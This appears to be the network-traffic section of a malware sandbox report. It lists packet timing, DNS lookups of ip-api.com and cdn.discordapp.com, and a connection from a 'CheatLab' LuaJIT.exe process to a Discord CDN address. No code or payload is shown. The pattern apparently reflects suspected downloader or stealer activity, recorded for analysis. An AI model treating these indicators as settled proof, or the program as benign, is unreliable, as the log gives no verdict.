                                                    Nov 4, 2023 01:30:13.318341970 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.321110010 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.321152925 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.325695992 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.325757027 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.326164007 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.326174974 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.326208115 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.326234102 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.327718019 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.327773094 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.329220057 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.329267979 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.330152035 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.330210924 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.331465960 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.331515074 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.332691908 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.332739115 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.333254099 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.333307028 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.333916903 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.334048033 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.334120989 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.340246916 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.340363979 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.368659019 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.368907928 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.369007111 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.404258966 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.404439926 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.443972111 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.444109917 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.471391916 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.471494913 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.495995045 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.496190071 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.552345037 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.552480936 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.575946093 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.576102018 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.576184988 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.585067034 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.585213900 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.585288048 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.593725920 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.593873024 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.593936920 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.599874020 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.599952936 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.605027914 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.605276108 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.605348110 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.610721111 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.610857964 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.617125034 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.617264986 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.617341042 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.640649080 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.640818119 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.640901089 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.697942019 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.698071957 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.749916077 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.750052929 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.750107050 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.767576933 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.767714977 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.767777920 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.805871010 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.806003094 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.822478056 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.822592020 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.835685968 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.835920095 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.835978985 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.848303080 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.848439932 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.848504066 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:13.851809025 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:13.851948977 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:16.737906933 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.737920046 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.737936020 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.737970114 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.737973928 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.737982035 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738002062 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738049030 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738050938 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.738056898 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738070011 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738121033 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738123894 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.738128901 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738145113 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738192081 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738195896 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.738200903 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738238096 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738254070 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738271952 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.738276958 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738290071 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738337994 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.738342047 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738348961 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738363981 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738384962 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.738420010 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738452911 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738455057 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.738462925 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738506079 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738519907 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.738519907 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738533020 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738574982 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738584995 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.738596916 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738629103 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738643885 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738653898 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.738656998 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.738766909 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.739392042 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.740040064 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.740072966 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.740128040 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.740134954 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.740173101 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.741838932 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.741863012 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.741981983 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.741992950 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.742033958 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.743273020 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.743304968 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.743350983 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.743360043 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.743408918 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.745295048 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.745322943 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.745531082 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.745539904 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.745615005 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.746933937 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.746962070 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.747005939 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.747014046 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.747087002 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.747117043 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.748416901 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.748439074 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.748543024 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.748550892 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.748590946 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.749888897 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.749911070 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.749979019 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.749989033 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.750044107 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.752125978 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.752151966 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.752218962 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.752227068 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.752273083 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.752298117 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.753902912 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.753930092 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.754020929 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.754029036 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.754077911 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.755177021 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.755197048 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.755259037 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.755265951 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.755310059 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.755341053 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.757811069 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.757829905 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.757934093 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.757944107 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.757987022 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.758955002 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.758980036 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.759072065 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.759078979 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.759130001 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.760068893 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.760591030 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.760617971 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.760725975 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.760735989 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.760783911 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.762201071 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.762228012 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.762299061 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.762307882 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.762345076 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.764163971 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.764189005 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.764221907 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.764230013 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.764338970 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.764348030 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.765472889 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.765490055 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.765544891 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.765552998 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.765587091 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.780978918 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.782109976 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.832782984 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.832845926 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.832849979 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.832871914 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.832920074 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.834089041 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.834110022 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.834160089 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.834167957 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.834204912 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.834726095 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.834762096 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.834800959 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.834805965 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.834841967 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.834856033 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.835122108 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.837162018 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.837178946 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.837234020 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.837240934 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.837275982 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.838742018 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.838757992 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.838795900 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.838802099 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.838834047 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.838856936 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.840682983 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.840698957 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.840761900 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.840770006 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.840873003 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.842531919 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.842549086 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.842601061 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.842614889 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.842662096 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.845279932 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.845304012 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.845360994 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.845367908 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.845402956 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.847270966 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.847286940 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.847359896 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.847366095 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.847414017 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.849253893 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.849270105 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.849330902 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.849342108 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.849381924 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.851113081 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.851128101 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.851213932 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.851219893 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.851263046 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.852888107 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.852906942 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.852938890 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.852945089 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.852971077 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.852988958 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.855187893 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.855202913 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.855257034 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.855262041 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.855298042 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.859144926 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.859169960 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.859205008 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.859210968 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.859239101 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.859258890 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.861294031 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.861310005 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.861382961 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.861387968 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.861429930 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.862159967 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.862174988 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.862267017 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.862272978 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.862319946 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.863971949 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.863989115 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.864070892 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.864074945 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.864128113 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.868577957 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.959428072 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.959449053 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.959500074 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.959537029 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.959572077 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.959589005 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.959605932 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.959618092 CET44349716162.159.130.233192.168.2.5
                                                    Timestamp                           Source Port  Dest Port  Source IP    Dest IP
                                                    Nov 4, 2023 01:30:07.877824068 CET  62675        53         192.168.2.5  1.1.1.1
                                                    Nov 4, 2023 01:30:07.972482920 CET  53           62675      1.1.1.1      192.168.2.5
                                                    Nov 4, 2023 01:30:15.602210045 CET  51610        53         192.168.2.5  1.1.1.1
                                                    Nov 4, 2023 01:30:15.694705963 CET  53           51610      1.1.1.1      192.168.2.5
                                                    Timestamp                           Source IP    Dest IP  Trans ID  OP Code             Name                Type            Class        DNS over HTTPS
                                                    Nov 4, 2023 01:30:07.877824068 CET  192.168.2.5  1.1.1.1  0x2317    Standard query (0)  ip-api.com          A (IP address)  IN (0x0001)  false
                                                    Nov 4, 2023 01:30:15.602210045 CET  192.168.2.5  1.1.1.1  0xe4fc    Standard query (0)  cdn.discordapp.com  A (IP address)  IN (0x0001)  false
                                                    Timestamp                           Source IP  Dest IP      Trans ID  Reply Code    Name                CName  Address          Type            Class        DNS over HTTPS
                                                    Nov 4, 2023 01:30:07.972482920 CET  1.1.1.1    192.168.2.5  0x2317    No error (0)  ip-api.com                 208.95.112.1     A (IP address)  IN (0x0001)  false
                                                    Nov 4, 2023 01:30:15.694705963 CET  1.1.1.1    192.168.2.5  0xe4fc    No error (0)  cdn.discordapp.com         162.159.130.233  A (IP address)  IN (0x0001)  false
                                                    Nov 4, 2023 01:30:15.694705963 CET  1.1.1.1    192.168.2.5  0xe4fc    No error (0)  cdn.discordapp.com         162.159.133.233  A (IP address)  IN (0x0001)  false
                                                    Nov 4, 2023 01:30:15.694705963 CET  1.1.1.1    192.168.2.5  0xe4fc    No error (0)  cdn.discordapp.com         162.159.129.233  A (IP address)  IN (0x0001)  false
                                                    Nov 4, 2023 01:30:15.694705963 CET  1.1.1.1    192.168.2.5  0xe4fc    No error (0)  cdn.discordapp.com         162.159.134.233  A (IP address)  IN (0x0001)  false
                                                    Nov 4, 2023 01:30:15.694705963 CET  1.1.1.1    192.168.2.5  0xe4fc    No error (0)  cdn.discordapp.com         162.159.135.233  A (IP address)  IN (0x0001)  false
                                                    • cdn.discordapp.com
                                                    • ip-api.com
                                                    Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
                                                    0           192.168.2.5  49716        162.159.130.233  443               C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    Timestamp  kBytes transferred  Direction  Data


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
